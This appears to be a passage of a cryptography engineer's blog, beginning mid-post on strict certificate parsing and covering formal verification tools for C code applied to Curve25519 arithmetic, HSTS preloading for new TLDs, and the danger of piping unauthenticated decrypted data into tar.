The file control.crt should always be accepted. The file missingnull.crt will be accepted if you allow the parameter to be omitted. (I recommend against that. BoringSSL doesn't allow it and we'll see whether we can make that stick.) Nothing else should be accepted.

Sadly, OpenSSL 1.0.1 also accepts highvaltag.crt (ordinary ASN.1 tags in high-value form) and indeflen.crt (BER indefinite lengths rather than DER). The OpenSSL development branch also accepts bernull.crt (superfluous zero bytes in a length). To be clear, there is no known vulnerability here, but it's unwelcome flexibility in something that should be rigid. (I let the OpenSSL team know on Wednesday, and told them that they're welcome to use the code from BoringSSL.)

Remember, we use PKCS in browsers because we have to deal with the world as we find it, not as we want it. If you are not so encumbered, consider something simpler.

A couple more formal systems

After my last post on formal analysis of C code, people pointed out several other options to me and I wanted to do a follow up because the conclusion is a little more positive now.

Firstly, I noted last time that Z3 was the best, Why3-compatible SMT solver for my problem but that it came with a non-commercial license. Craig Stuntz pointed out that Microsoft sell a commercial license for $10K. Sure, that's quite a lot for a hobbyist project, but it's easy for a corporation and a lot easier than having to negotiate specially.

The first additional thing that I've looked into is AutoCorres. I mentioned last time that SeL4's refinement proof to C code involved a C parser in Isabelle that output structures in the Simpl framework and that Simpl was pretty intimidating.

AutoCorres is a tool for verifiably simplifying the Simpl structures and thus making proofs easier. Let's repeat the example from last time and show how AutoCorres helps. Here's the test C function:

int add(int a, int b) {
  return a+b;
}

And here's the raw result from the C parser, exactly as I showed last time:

test_global_addresses.add_body ≡
TRY
  Guard SignedArithmetic ⦃-2147483648 ≤ sint ´a + sint ´b ∧ sint ´a + sint ´b ≤ 2147483647⦄
   (creturn global_exn_var_'_update ret__int_'_update (λs. a_' s + b_' s));;
  Guard DontReach {} SKIP
CATCH SKIP
END

And here's what AutoCorres makes of it:

add' ?a ?b ≡
  DO oguard (λs. INT_MIN ≤ ?a + ?b);
     oguard (λs. ?a + ?b ≤ INT_MAX);
     oreturn (?a + ?b)
  OD

That's very impressive! That's using a Maybe monad (using the Haskell name) in Isabelle to handle the possible overflow. Obviously that's a lot easier to deal with than the raw Simpl. Here's the field addition function that I was using for the other examples in the previous post:

void add(int *out, const int *x, const int *y) {
  unsigned int i;
  unsigned int size = 10;
  for (i = 0; i < size; i++) {
    out[i] = x[i] + y[i];
  }
}

And here it is after AutoCorres:

add' ?out ?x ?y ≡
do i ← whileLoop (λi s. i < 0xA)
          (λi. do guard (λs. is_valid_w32 s (ptr_coerce (?out +⇩p uint i)));
                  guard (λs. is_valid_w32 s (ptr_coerce (?x +⇩p uint i)));
                  guard (λs. is_valid_w32 s (ptr_coerce (?y +⇩p uint i)));
                  guard (λs. INT_MIN ≤ sint (ucast s[ptr_coerce (?x +⇩p uint i)]) + sint (ucast s[ptr_coerce (?y +⇩p uint i)]));
                  guard (λs. sint (ucast s[ptr_coerce (?x +⇩p uint i)]) + sint (ucast s[ptr_coerce (?y +⇩p uint i)]) ≤ INT_MAX);
                  modify (λs. s[ptr_coerce (?out +⇩p uint i) := s[ptr_coerce (?x +⇩p uint i)] + s[ptr_coerce (?y +⇩p uint i)]]);
                  return (i + 1)
               od)
         0;
   skip
od

While the AutoCorres output looks very clean, there isn't any documentation at the moment which means that it's a little hard to actually use. (There are a couple of papers on the home page that are well worth reading - but I didn't find anything like a user guide.) There are some examples from which it's possible to make some guesses, but I wasn't able to get very far in a proof. Also, since AutoCorres builds on Simpl and C parser, it has the same limitations - most notably that the address of local variables can't be taken.

None the less, AutoCorres holds a lot of promise.

Next is VST from Andrew Appel and others (yes, that Appel). VST is a framework for proving the behaviour of C code with Coq by using one of the intermediate languages from CompCert. Coq (which I'm pronouncing as “coke”) is a proof system like Isabelle and CompCert is a formally verified compiler. That means that it's possible to have a chain of formal verification from C code all the way to the semantics of the machine language! Additionally, the C parser isn't correctness critical because VST proves properties using the same parse tree as the verified compiler. That's an extremely strong verification standard.

CompCert is a mixture of GPL and “non-commercial” licensed code. It appears that everything needed for VST is licensed as GPL or another free license. So, one can also use VST to verify C code and then use a different compiler to build it if the non-commercial restriction is a problem. That moves the CompCert C parser and the other compiler into the trusted set, but so it goes.

The VST logic also appears to be very capable. It doesn't have a problem with pointers to local variables and should even have the capability to support reasoning about concurrent programs. The restrictions that it does have are local changes: only one memory load per line (at the moment) or side effect per statement and void functions need an explicit return at the end. (Unfortunately, one doesn't get an error from violating these requirements - rather the proof cannot be completed.)

VST, thankfully, has brief documentation online which is expanded upon in the form of a book ($15 as a DRMed download). The book contains a very abstract articulation of the underlying logic which, to be honest, defeated me initially. I'd recommend skipping chapters 2 through 21 on a first reading and coming back to them later. They are useful, but they're also a lot clearer after having played with the software for a while.

Here's the same example function, translated into VST style. I switched back from having a special output array because that was something that I changed to make the SPARK verification easier but it was never part of the original code and VST doesn't have a problem with overlapping the input and output. I've also switched from a for loop to a while loop because the documentation and examples for the latter are better. Otherwise, the changes are just to limit each statement to a single memory access and to include the final return.

void add(int *a, int *b) {
	int t1, t2;
	int i = 0;
	while (i < 10) {
		t1 = a[i];
		t2 = b[i];
		a[i] = t1 + t2;
		i++;
	}
	return;
}

We can use clightgen from CompCert to parse that into the intermediate language that CompCert and VST use. (A word to the wise - if you want to install VST, use exactly Coq 8.4p2, not the latest version which is 8.4p4.) Then we can use Coq to prove its behaviour.

Coq's proofs aren't as clear as the Isar-style proofs in Isabelle (although the terseness is more useful when proofs are this complex) and neither Proof General nor CoqIDE is as nice as Isabelle's jEdit mode. But it's not otherwise dramatically different.

Here's a specification of add in VST/Coq's language:

Definition bound_int (v : val) (b : Z) :=
  match v with
  | Vint i => -b < (Int.signed i) < b
  | _ => False
  end.

Definition partial_add (i: Z) (l: Z -> val) (r: Z -> val) (j: Z) :=
  if zlt j i then Val.add (l j) (r j) else (l j).

Definition add_spec :=
  DECLARE _add
  WITH a0 : val, b0 : val, sh : share, orig_a : Z -> val, orig_b : Z -> val
  PRE [_a OF (tptr tint), _b OF (tptr tint)]
    PROP (writable_share sh;
          forall i, 0 <= i < 10 -> is_int (orig_a i);
          forall i, 0 <= i < 10 -> is_int (orig_b i);
          forall i, 0 <= i < 10 -> bound_int (orig_a i) 134217728;
          forall i, 0 <= i < 10 -> bound_int (orig_b i) 134217728)
    LOCAL (`(eq a0) (eval_id _a);
           `(eq b0) (eval_id _b);
           `isptr (eval_id _a);
           `isptr (eval_id _b))
    SEP (`(array_at tint sh orig_a 0 10 a0);
         `(array_at tint sh orig_b 0 10 b0))
  POST [ tvoid ]
    PROP ()
    LOCAL ()
    SEP (`(array_at tint sh (partial_add 10 orig_a orig_b) 0 10 a0);
         `(array_at tint sh orig_b 0 10 b0)).

The partial_add function implements a map that reflects the state of the a array at step i of the loop. I've written it like that so that it can also be used in the loop invariant.
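To see what that means operationally, here is a Python model of the C function with the invariant and postcondition written as assertions. It is only an analogy for the Coq definitions: Python integers don't overflow, so the bound_int precondition isn't modelled, and arrays are plain lists rather than maps from index to value.

```python
def partial_add(i, l, r, j):
    # Mirrors the Coq definition: elements below i have already been summed.
    return l[j] + r[j] if j < i else l[j]


def add(a, b):
    orig_a = list(a)
    i = 0
    while i < 10:
        # Loop invariant: a is orig_a with the first i elements updated.
        assert a == [partial_add(i, orig_a, b, j) for j in range(10)]
        t1 = a[i]
        t2 = b[i]
        a[i] = t1 + t2
        i += 1
    # Postcondition: the invariant with i = 10.
    assert a == [partial_add(10, orig_a, b, j) for j in range(10)]
    return a
```

Running `add(list(range(10)), [1] * 10)` passes every assertion. The Coq proof establishes the same statements for all inputs that meet the precondition, rather than checking them for a single run.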

And here's the proof: It is quite long, but at least half of that is because I've not used Coq before and I don't know what I'm doing. I wouldn't call it readable however.

Definition inv orig_a a0 orig_b b0 sh :=
  EX i:Z,
    (PROP (0 <= i < 11;
           isptr a0;
           isptr b0)
     LOCAL (`(eq a0) (eval_id _a);
            `(eq b0) (eval_id _b);
            `(eq (Vint (Int.repr i))) (eval_id _i))
   SEP (`(array_at tint sh (partial_add i orig_a orig_b) 0 10 a0);
        `(array_at tint sh orig_b 0 10 b0))).

Lemma mod_nop : forall (i : Z) (m : Z), 0 <= i < m -> m > 0 -> i mod m = i.
Proof.
intros.
rewrite Zdiv.Zmod_eq.
assert(i/m=0).
apply Zdiv_small.
exact H.
rewrite H1.
omega.
exact H0.
Qed.

Lemma body_sumarray: semax_body Vprog Gprog f_add add_spec.
Proof.
start_function.
forward.
forward_while
  (inv orig_a a0 orig_b b0 sh)
  (
     PROP ()
     LOCAL ()
     SEP (`(array_at tint sh (partial_add 10 orig_a orig_b) 0 10 a0);
          `(array_at tint sh orig_b 0 10 b0))).
apply exp_right with 0.
entailer!.
quick_typecheck.
entailer.
cancel.
assert(i=10).
omega.
rewrite H7.
cancel.
forward.
entailer!.
unfold partial_add.
assert(is_int (orig_a i)).
auto.
assert(is_int (orig_b i)).
auto.
if_tac.
omega.
exact H7.
forward.
entailer!.
forward.
entailer.
apply prop_right.
assert(Vint (Int.add _id1 _id) = partial_add (i+1) orig_a orig_b (Int.signed (Int.repr i))).
Focus 2.
symmetry in H9.
apply H9.
unfold partial_add.
assert(Int.signed (Int.repr i) = i).
rewrite Int.signed_repr.
reflexivity.
unfold Int.max_signed, Int.min_signed.
simpl.
omega.
rewrite H9.
if_tac.
unfold Val.add.
rewrite Int.signed_repr_eq in H7.
rewrite mod_nop in H7.
if_tac in H7.
unfold partial_add in H7.
if_tac in H7.
omega.
rewrite Int.signed_repr_eq in H6.
rewrite mod_nop in H6.
if_tac in H6.
unfold Int.add, Int.unsigned, Int.intval, Int.repr.
assert(bound_int (orig_a i) 134217728).
auto.
unfold bound_int in H12.
symmetry in H7, H6.
rewrite H7.
rewrite H6.
reflexivity.
omega.
assert(Int.modulus = 4294967296).
auto.
rewrite H13.
omega.
assert(Int.modulus = 4294967296).
auto.
omega.
assert(i < Int.half_modulus).
assert(Int.half_modulus = 2147483648).
auto.
rewrite H12.
rewrite H12 in H11.
omega.
omega.
assert(Int.modulus = 4294967296).
auto.
omega.
assert(Int.modulus = 4294967296).
auto.
rewrite H11.
omega.
omega.
forward.
unfold inv.
apply exp_right with (Zsucc i).
entailer!.
apply derives_refl'.
apply equal_f.
apply array_at_ext.
intros.
unfold upd.
if_tac.
rewrite H10.
unfold Z.succ.
reflexivity.
unfold partial_add.
if_tac.
if_tac.
reflexivity.
omega.
if_tac.
omega.
reflexivity.
forward.
Qed.

That's certainly quite a chunk! Practically you have to step through the proof in Proof General and see the state evolve to understand anything. Additionally, when in the proof, it would be very useful if subgoals had some sort of description like “show the loop invariant plus not the loop condition results in the loop post-condition” - it's very easy to get lost in the proof. But I do feel that, while it would be a lot of work, I could make progress with VST, which I don't (at the moment) feel about the other systems. Prof. Appel recently did a formal verification of the SHA256 from OpenSSL.

However, there is no community around VST that I can find - no mailing list, wiki, etc. The Subversion repo is only accessible via HTTP - you can't clone it from what I can tell. I think I found a (completeness) bug in VST, but the only option would be to try emailing Prof. Appel. (I didn't; I'm probably wrong.)

Still, AutoCorres and especially VST leave me more optimistic than I was at the end of the last post!

Others

I didn't have time to look at everything that deserved attention. Cryptol is one. Cryptol is a tool written in Haskell designed for the specification and implementation of cryptographic code and can call out to SMT solvers to show certain properties. From its internal language it can export implementations to (at least) C.

Next, Frama-C, which I mentioned last time in relation to the Jessie plugin, has other plugins. One that's useful is the value analysis, which can be properly used to eliminate NULL derefs, array overruns etc. In fact, Polar SSL has been fully validated in certain configurations using that. That's certainly very valuable, and you can do it without that multi-page Coq proof! Although such analysis wouldn't have caught the carry bug in Ed25519 nor the reduction bug in Donna, not all code is going to be suitable for formal analysis.

Microsoft also have lots of things. There's Dafny, VCC (Verifier for Concurrent C), Boogie, Havoc, Z3 and others! I didn't look at them because I don't have a Windows box to hand this week (although I see that some are exposed via a web interface too). I was thinking that maybe I'd have time when a Windows box was to hand but, realistically, probably not. So I've updated this post to mention them here. If you are Windows based, you will probably do well to pay attention to them first.

A shallow survey of formal methods for C code

Two interesting things in formally verified software happened recently. The big one was the release of SeL4 - a formally verified L4 microkernel. The second was much smaller, but closer to my usual scope: a paper which showed the correctness of sections of a couple of the assembly implementations of Curve25519.

Overflow and carry bugs are subtle and, although with 32-bit words you might hope to be able to do enough random testing to eliminate them, that's much less plausible with 64-bit implementations. The TweetNaCl paper mentions a bug that lived in one of the assembly implementations of ed25519 for years and I've sinned too:

When I wrote curve25519-donna (back when it was the only 64-bit implementation of Curve25519), I first wrote a 32-bit version which mirrored the implementation of the athlon assembly version. This was just to provide a reference for the 64-bit code, but it was included in the repository for education. It was never really supposed to be used, and wasn't constant-time, but I was aware that it was being used by some groups.

Many years later, someone noticed that it was missing a reduction in the final contraction. Values between 2^255-19 and 2^255 would be output when they should have been reduced. This turned out to be harmless (as best I can tell), but embarrassing none the less.
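To make that class of bug concrete, here is a minimal sketch using a toy modulus of the same shape, 2^31-19, so that everything fits in a machine word. This is not Donna's code: the names (toy_contract_buggy, toy_contract) and the shrunken modulus are assumptions for illustration, and the final subtraction branches on the value, so it is not constant-time.

```c
#include <assert.h>
#include <stdint.h>

/* Toy modulus with the same shape as 2^255 - 19, shrunk to 31 bits. */
#define TOY_BITS 31
#define TOY_MASK ((UINT64_C(1) << TOY_BITS) - 1)
#define TOY_P (TOY_MASK - 18) /* 2^31 - 19 */

/* Folds the bits above position 31 back in, using 2^31 = 19 (mod p).
 * The result fits in 31 bits but may still lie in [p, 2^31): this is
 * the "missing final reduction" shape of bug. */
static uint32_t toy_contract_buggy(uint64_t v) {
  for (int i = 0; i < 3; i++) {
    v = (v & TOY_MASK) + 19 * (v >> TOY_BITS);
  }
  assert(v <= TOY_MASK); /* three folds are enough for any 64-bit input */
  return (uint32_t)v;
}

/* Same folding, followed by the final conditional subtraction of p. */
static uint32_t toy_contract(uint64_t v) {
  uint32_t r = toy_contract_buggy(v);
  if (r >= TOY_P) {
    r -= (uint32_t)TOY_P;
  }
  return r;
}
```

Only nineteen inputs in the 31-bit range distinguish the two functions, which is why random testing is so unlikely to find this sort of thing.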

And Curve25519 is a very nice curve to implement! Take a look at the overflow considerations for this version of P-256. I hope that I got everything right there, but it's very complex. More formal verification of the software would be welcome!

SeL4 has a multi-stage verification using refinement. Refinement is the process of showing that two pieces of code behave identically where one version is more abstract. SeL4's proof refines from an abstract specification to a Haskell implementation to the C implementation. It also has a SAT-solver based proof that the ARMv6 assembly matches the C implementation.

The refinement proofs are done in Isabelle/HOL which, along with Coq, are the major proof systems. (There are several other systems including HOL Light, HOL4 and Mizar.) Proof systems assist in the construction of automated proofs using simple rules of inference and axioms. Although not used for software verification, Metamath is a good introduction to the idea. It clearly explains its axioms (which Isabelle and Coq are very bad at) and gives an idea for the scale of formal proofs with an example of 2+2 = 4.

The best introduction to Isabelle that I know of is the book Concrete Semantics, although I do wish that it would start with Isar style proofs much sooner. If you're doing work in Isabelle I think you need page 57 printed and stuck to the wall and if you're going through that book and exercises I'd recommend peeking at the Isar chapter sooner.

But Isabelle's traditional workflow is to write in its functional language and export to OCaml or Haskell. That's no help if we're seeking to prove things about C code.

Isabelle's theorems are objects in its underlying ML language and so you can write a program in ML that parses C and use the result in Isabelle. That's what SeL4 does. The underlying framework for expressing imperative languages in Isabelle is Schirmer's Simpl and this imposes some odd limitations on the C that can be processed. For one, all the local variables with the same name in a given .c file have to have the same type because the local state of all functions in a .c file is represented in a single struct. For the same reason, it's not possible to take the address of a local variable.

But we can try parsing a very simple C file with SeL4's parser:

int add(int a, int b) {
  return a+b;
}

That fits SeL4's C subset (called StrictC - see l4v/tools/c-parser/doc in the SeL4 source) and results in this Simpl construct (you'll need to read the Simpl paper to really understand it):

test_global_addresses.add_body ≡
TRY
  Guard SignedArithmetic ⦃-2147483648 ≤ sint ´a + sint ´b ∧ sint ´a + sint ´b ≤ 2147483647⦄
   (creturn global_exn_var_'_update ret__int_'_update (λs. a_' s + b_' s));;
  Guard DontReach {} SKIP
CATCH SKIP
END

There's clearly an overflow check in there, which is good, but to call the process of starting to prove things about it intimidating to the beginner would be an understatement. That and the oddities of the C subset motivated me to look further.

Dependent types are closely related to this problem so I checked Wikipedia for the dependently typed languages which support imperative programming and that are still active. That's just ATS and F*, according to that table. ATS doesn't deal with overflows and, while F*/F7 is worthy of a look because of miTLS, it's a CLR language and so not applicable here.

Next up, based on searches, is SPARK. SPARK is a subset of Ada designed for verification. There's a commercial company behind it, but versions are published under the GPL. It even comes with an IDE.

SPARK uses an SMT solver to prove correctness, which is very different from a proof in Isabelle. While an Isabelle proof is, by construction, just an application of axioms and rules of inference, an SMT solver is essentially a magic box into which you feed a proposition and out of which (maybe) comes a true/false answer. Trusting in an SMT solver is much, much stronger than not doing so, but it is a step down from a formal proof system. SPARK uses a version of Why3 to abstract over SMT solvers and we'll discuss Why3 more later.

Anyway, here's the same, trivial function in Ada:

function Add(X, Y : in Integer_32) return Integer_32 is
begin
   return X + Y;
end Add;

If we ask SPARK to process that then it generates verification conditions (VCs): one for each possible thing that could go wrong - overflow, array indexing etc. For that code it throws an error saying that X + Y might overflow, which is promising! In order to eliminate that, one needs to prove the verification condition that says that the addition is safe by adding preconditions to the function (which then become VCs at each callsite):

function Add(X, Y : in Integer_32) return Integer_32 with
  Pre => X < 2**30 and X > -2**30 and Y < 2**30 and Y > -2**30;

With that precondition, the function is accepted. I should note that this is SPARK 2014; there are many older versions (SPARK has been going for a long time) and they kept preconditions and the like in comments. Lots of pages about SPARK still talk about the older versions and major projects in SPARK (like Ironsides - a DNS server) still use the older versions.
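The arithmetic behind that precondition is easy to check by hand: if both inputs are strictly inside ±2^30 then the sum is at most 2^31-2 in magnitude, which fits in a signed 32-bit value. A rough C rendering follows, with runtime asserts standing in for the precondition (they are checks, not proofs, and the function names are mine):

```c
#include <assert.h>
#include <stdint.h>

#define BOUND (INT32_C(1) << 30) /* 2**30, as in the SPARK precondition */

/* Adds two values that satisfy -2^30 < v < 2^30. */
static int32_t add_bounded(int32_t x, int32_t y) {
  assert(x > -BOUND && x < BOUND);
  assert(y > -BOUND && y < BOUND);
  /* |x + y| <= 2 * (2^30 - 1) = 2^31 - 2, so this cannot overflow. */
  return x + y;
}

/* Widest sum that the precondition permits, computed in 64 bits. */
static int64_t max_sum_under_precondition(void) {
  return 2 * ((int64_t)BOUND - 1);
}
```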

With that initial success, let's try something a tiny bit more involved. Curve25519 deals with 255-bit integers but CPUs don't. So, in the same way that a 64-bit integer could be represented with a pair of 32-bit integers, 255-bit integers are represented in Donna with ten 32-bit integers. This representation is a little odd because the values aren't spaced at 32-bit multiples, but rather at alternating 26 and 25 bit positions. That also means that the representation is non-unique (setting bit 26 of the first word is equal to setting bit zero of the second) and that's done for performance. See this for more details, but it's not important right now.
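The non-uniqueness can be seen with just the first three limbs, which sit at bit positions 0, 26 and 51. This is a sketch only: limbs3_value is a hypothetical helper, and it is limited to three limbs (with a small third limb) so that the value fits in an int64_t.

```c
#include <assert.h>
#include <stdint.h>

/* Value of the first three limbs of a Donna-style number. Limbs start at
 * bit positions 0, 26 and 51 (alternating 26- and 25-bit widths). */
static int64_t limbs3_value(const int32_t x[3]) {
  /* Keep the top limb small so that the sum cannot overflow 64 bits. */
  assert(x[2] > -2048 && x[2] < 2048);
  return (int64_t)x[0] + (int64_t)x[1] * (INT64_C(1) << 26) +
         (int64_t)x[2] * (INT64_C(1) << 51);
}
```

For example, the limbs {1 << 26, 0, 0} and {0, 1, 0} give the same value, as do {0, 1 << 25, 0} and {0, 0, 1}.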

Adding these 255-bit integers is done simply by adding the underlying words without carry, with suitable bounds on the inputs so that overflow doesn't happen:

type Ints is array (Integer range 0 .. 9) of Integer_32;

function Add (X, Y : in Ints) return Ints with
   Pre => (for all i in Ints'Range => X(i) < 2**30 and X(i) > -2**30 and Y(i) < 2**30 and Y(i) > -2**30),
   Post => (for all i in Ints'Range => Add'Result(i) = X(i) + Y(i));

function Add (X, Y : in Ints) return Ints is
   Sum : Ints;
begin
   for i in Ints'Range loop
      Sum(i) := X(i) + Y(i);
   end loop;

   return Sum;
end Add;

That mostly works, but SPARK can't prove that the result is X(i) + Y(i) for all i despite it being exactly what the function says. One really needs to spoon feed the prover: in this case with a loop invariant in the for loop:

for i in Ints'Range loop
   pragma Loop_Invariant (for all j in Ints'First .. i-1 => Sum(j) = X(j) + Y(j));
   Sum(i) := X(i) + Y(i);
end loop;

Sadly, that doesn't work either, despite being correct, because SPARK doesn't seem to like i-1 when i might be zero. So, trying again:

for i in Ints'Range loop
   Sum(i) := X(i) + Y(i);
   pragma Loop_Invariant (for all j in Ints'First .. i => Sum(j) = X(j) + Y(j));
end loop;

That one works, but now SPARK isn't sure whether uninitialised elements of Sum are being referenced. The property of being initialised isn't part of SPARK's logic and it seems that the only way to proceed here is to disable that warning!

But, there's some promise! We would now like to show a higher level property of Add: that the 255-bit integer that the returned array represents is the sum of the integers that the input arrays represent. This means that the logic needs to deal with arbitrary integers and that we need to write a function in the logic that turns an array into an abstract integer.

Enabling arbitrary integers in the logic is possible (although good luck finding how to do it in the documentation: the answer is to put a file called gnat.adc in the gnatprove subdirectory of the project containing pragma Overflow_Mode (General => Strict, Assertions => Eliminated);). However, I failed at writing functions in the logic without dropping down into code and triggering overflow checks. It appears that ghost functions should be able to do this but, after getting the answer to a documentation bug on StackOverflow, actually trying to use any logic functions, even the identity function, caused the proof not to terminate. SPARK claims to be able to use Isabelle for proofs but I couldn't get that to work at all: strace says that the .thy file isn't ever written.

Stuck, I moved on from SPARK and tried Frama-C and its Jessie plugin. Even if SPARK was working for me, using C (even a subset) has advantages: it's convenient to use in other projects, there exist verified compilers for it and there's an extension to CompCert that allows for static verification of constant-time behaviour (although I've lost the paper!)

So here's the same function in Frama-C:

/*@ requires \valid_range(out, 0, 9);
  @ requires \valid_range(x, 0, 9);
  @ requires \valid_range(y, 0, 9);
  @ requires \forall integer i; 0 <= i < 10 ==>
      (x[i] > -1000 && x[i] < 1000);
  @ requires \forall integer i; 0 <= i < 10 ==>
      (y[i] > -1000 && y[i] < 1000);
  @ ensures \forall integer i; 0 <= i < 10 ==> (out[i] == x[i] + y[i]);
*/
void add(int *out, const int *x, const int *y) {
  /*@ loop invariant i >= 0 && i <= 10 &&
        (\forall integer j; 0 <= j < i ==> out[j] == x[j] + y[j]);
    @ loop variant 10-i;
    */
  for (int i = 0; i < 10; i++) {
    out[i] = x[i] + y[i];
  }
}

Note that this time we not only need a loop invariant to show the postcondition, but we also need a loop variant to show that the for loop terminates: you really need to spoon feed the verification! But Frama-C/Jessie has no problem with functions in the logic:

/*@ logic integer felemvalue (int *x) =
      x[0] + x[1] * (1 << 26) + x[2] * (1 << 51) + x[3] * (1 << 77) +
      x[4] * (1 << 102) + x[5] * 340282366920938463463374607431768211456 +
      x[6] * 11417981541647679048466287755595961091061972992 +
      x[7] * 766247770432944429179173513575154591809369561091801088 +
      x[8] * 25711008708143844408671393477458601640355247900524685364822016 +
      x[9] * 1725436586697640946858688965569256363112777243042596638790631055949824; */

That function maps from an array to the abstract integer that it represents. Note that the terms switched from using shifts to represent the constants to literal numbers. That's because the proof process suddenly became non-terminating (in a reasonable time) once the values reached about 104-bits, but the literals still worked.

With that logic function in hand, we can easily prove the higher-level concept that we wanted as a post condition of the add function:

@ ensures felemvalue(out) == felemvalue(x) + felemvalue(y);

Flushed with success, I moved onto the next most basic function: multiplication of 255-bit integers. The code that Donna uses is the textbook, polynomial multiplication code. Here's how the function starts:

/* Multiply two numbers: output = in2 * in
 *
 * output must be distinct to both inputs. The inputs are reduced coefficient
 * form, the output is not.
 *
 * output[x] <= 14 * the largest product of the input limbs. */
static void fproduct(limb *output, const limb *in2, const limb *in) {
  output[0] =       ((limb) ((s32) in2[0])) * ((s32) in[0]);
  output[1] =       ((limb) ((s32) in2[0])) * ((s32) in[1]) +
                    ((limb) ((s32) in2[1])) * ((s32) in[0]);
  output[2] =  2 *  ((limb) ((s32) in2[1])) * ((s32) in[1]) +
                    ((limb) ((s32) in2[0])) * ((s32) in[2]) +
                    ((limb) ((s32) in2[2])) * ((s32) in[0]);
  …

Each of the lines is casting a 64-bit number down to 32 bits and then doing a 32×32⇒64 multiplication. (The casts down to 32 bits are just to tell the compiler not to waste time on a 64×64⇒64 multiplication.) In Frama-C/Jessie we need to show that the casts are safe, multiplications don't overflow and nor do the sums and multiplications by two etc. This should be easy. Here are the preconditions that set the bounds on the input.

/*@ requires \valid_range(output, 0, 18);
  @ requires \valid_range(in, 0, 9);
  @ requires \valid_range(in2, 0, 9);
  @ requires \forall integer i; 0 <= i < 10 ==> -134217728 < in[i] < 134217728;
  @ requires \forall integer i; 0 <= i < 10 ==> -134217728 < in2[i] < 134217728;
*/
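The bounds involved are small enough to check by hand. 134217728 is 2^27, so each product is below 2^54 in magnitude, and fourteen of those (the factor from the comment on fproduct) is far below 2^63. A sketch of the same reasoning as runtime checks, with hypothetical helper names:

```c
#include <assert.h>
#include <stdint.h>

#define LIMB_BOUND INT64_C(134217728)           /* 2^27, exclusive */
#define PRODUCT_BOUND INT64_C(18014398509481984) /* 2^54, exclusive */

/* Largest magnitude that one 32x32->64 product can reach. */
static int64_t max_product(void) {
  return (LIMB_BOUND - 1) * (LIMB_BOUND - 1);
}

/* One term of the multiplication, with both bounds checked at runtime. */
static int64_t mul_limbs(int32_t a, int32_t b) {
  assert(a > -LIMB_BOUND && a < LIMB_BOUND);
  assert(b > -LIMB_BOUND && b < LIMB_BOUND);
  int64_t t = (int64_t)a * b;
  assert(t > -PRODUCT_BOUND && t < PRODUCT_BOUND);
  return t;
}
```

Since max_product() is no more than INT64_MAX / 14, a sum of fourteen such terms cannot overflow a 64-bit limb.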

However, Why3, which is the prover backend that Jessie (and SPARK) uses, quickly gets bogged down. In an attempt to help it out, I moved the casts to the beginning of the function and put the results in arrays so that the code was less complex.

As you can see in the Jessie documentation, the Why3 UI allows one to do transforms on the verification conditions to try and make life easier for the prover. Quickly, splitting a requirement becomes necessary. But this throws away a lot of information. In this case, each of the 32×32⇒64 multiplications is assumed to fit only within its bounds and so the intermediate bounds need to be reestablished every time. This means that the equations have to be split like this:

limb t, t2;
t = ((limb) in2_32[0]) * in_32[1];
//@ assert -18014398509481984 < t < 18014398509481984;
t2 = ((limb) in2_32[1]) * in_32[0];
//@ assert -18014398509481984 < t2 < 18014398509481984;
output[1] = t + t2;

That's only a minor problem really, but the further one goes into the function, the harder the prover needs to work for some reason. It's unclear why because every multiplication has the same bounds - they are all instances of the same proof. But it's very clear that the later multiplications are causing more work.

Why3 is an abstraction layer for SMT solvers and a large number are supported (see “External provers” on its homepage for a list). I tried quite a few and, for this task, Z3 is clearly the best with CVC4 coming in second. However, Z3 has a non-commercial license which is very worrying - does that mean that a verified version of Curve25519 that used Z3 has to also have a non-commercial license? So I stuck to using CVC4.

However, about a quarter of the way into the function, both CVC4 and Z3 are stuck. Despite the bounds being a trivial problem, and just instances of the same problem that they can solve at the beginning of the function, somehow either Why3 is doing something bad or the SMT solvers are failing to discard irrelevant facts. I left it running overnight and Z3 solved one more instance after six hours but achieved nothing after 12 hours on the next one. Splitting and inlining the problem further in the Why3 GUI didn't help either.

Like SPARK, Jessie can use Isabelle for proofs too (and for the same reason: they are both using Why3, which supports Isabelle as a backend). It even worked this time, once I added Real to the Isabelle imports. However, in the same way that the C parser in Isabelle was an ML function that created Isabelle objects internally, the Why3 connection to Isabelle is a function (why3_open) that parses an XML file. This means that the proof has large numbers of generated variable names (o33, o34, etc) and you have no idea which intermediate values they are. Additionally, the bounds problem is something that Isabelle could have solved automatically, but the assumptions that you can use are similarly autonamed as things like local.H165. In short, the Isabelle integration appears to be unworkable.

Perhaps I could split up each statement in the original code into a separate function and then write the statement again in the logic in order to show the higher level properties, but at some point you have to accept that you're not going to be able to dig this hole with a plastic spoon.

Conclusion

The conclusion is a bit disappointing really: Curve25519 has no side effects and performs no allocation, it's a pure function that should be highly amenable to verification and yet I've been unable to find anything that can get even 20 lines into it. Some of this might be my own stupidity, but I put a fair amount of work into trying to find something that worked.

There seems to be a lot of promise in the area and some pieces work well (SMT solvers are often quite impressive, the Frama-C framework appears to be solid, Isabelle is quite pleasant) but nothing I found worked well together, at least for verifying C code. That makes efforts like SeL4 and Ironsides even more impressive. However, if you're happy to work at a higher level I'm guessing that verifying functional programs is a lot easier going.

HSTS for new TLDs

Whatever you might think of them, the new TLDs are rapidly arriving. New TLDs approved so far this month include alsace, sarl, iinet, poker, gifts, restaurant, fashion, tui and allfinanz. The full list for last month is over twice as long.

That means that there's lots of people currently trying to figure out how to differentiate themselves from other TLDs. Here's an idea: why not ask me to set HSTS for the entire TLD? That way, every single site runs over HTTPS, always. It strikes me that could be useful if you're trying to build trust with users unfamiliar with the zoo of new domains.

(I can't speak for Firefox and Safari but I think it's safe to assume that Firefox would be on board with this. It's still unclear whether IE's support for HSTS will include preloading.)

I'm guessing that, with such a large number of new TLDs, I should be able to reach at least some operators of them via this blog post.

Encrypting streams

When sending data over the network, chunking is pretty much a given. TLS has a maximum record size of 16KB and this fits neatly with authenticated encryption APIs which all operate on an entire message at once.

But file encryption frequently gets this wrong. Take OpenPGP: it bulk encrypts the data and sticks a single MAC on the end. Ideally everyone is decrypting to a temporary file and waiting until the decryption and verification is complete before touching the plaintext, but it takes a few seconds of searching to find people suggesting commands like this:

gpg -d your_archive.tgz.gpg | tar xz

With that construction, tar receives unauthenticated input and will happily extract it to the filesystem. An attacker doesn't (we assume) know the secret key, but they can guess at the structure of the plaintext and flip bits in the ciphertext. Bit flips in the ciphertext will produce a corresponding bit flip in the plaintext, followed by randomising the next block. I bet some smart attacker can do useful things with that ability. Sure the gpg command will exit with an error code, but do you think that the shell script writer carefully handled that case and undid the changes to the filesystem?
